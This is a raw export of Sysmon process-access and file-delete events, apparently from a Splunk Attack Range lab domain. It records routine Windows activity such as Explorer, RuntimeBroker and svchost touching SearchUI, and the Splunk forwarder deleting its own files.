07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}635610012C:\Windows\Explorer.EXE{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8e62|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-770B-00000000CF01}63564564C:\Windows\Explorer.EXE{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+109146|C:\Windows\System32\TwinUI.dll+82a97|C:\Windows\System32\TwinUI.dll+beade|C:\Windows\System32\TwinUI.dll+beaa9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:43.013{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\execmodelclient.dll+8d5e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001048527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.716{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D1D0CC30143925C23BD1220D37FC1A4,SHA256=07DDCF202B3E1173ABC51045BBC15F00BE02B46852AF00ED93326A75849DF24D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807484Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:44.196{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ADC3415BF60EF91D0FFB2E670440DB3,SHA256=A10B0548084E6C508AE21F307C77A664099C456F371B347195D2A3AF88E1953F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.701{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.701{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.685{466BC892-32D3-60E8-6F0B-00000000CF01}70767116C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+36f20|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+32f80|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+22534|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\SharedStartModel.dll+77f37|C:\Windows\System32\SharedStartModel.dll+b2d9d|C:\Windows\System32\SharedStartModel.dll+b2a24|C:\Windows\System32\SharedStartModel.dll+b2fab|C:\Windows\system32\windows.cortana.Desktop.dll+a274|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f 10341000x80000000000000001048523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048521Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048518Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.669{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2C00-00000000CF01}3064C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.654{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+cdc7|C:\Windows\system32\windows.cortana.Desktop.dll+aedd|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001048516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.654{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+ae11|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 23542300x80000000000000001048515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E7301BC97D3D7C00A0B8293A848780,SHA256=816C70DF5D8EB4EF8F0D028879F3C58D9D84A2270A8697E54FDD1B3BB36F4392,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77A403A6402C6B4C6279D778C166CA4C,SHA256=C2F3C734DED9186BCFD92D7A8FB346E74AAACC42E20C939A06485E4D342D1ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.354{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF3E0A41BDD2D3E5E45CC29E7977866E,SHA256=B9EC79CA7B742C94D0090A7E032E15FF115C13C8012733773C7CFB2914B0D643,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048511Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048510Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:44.201{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048509Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 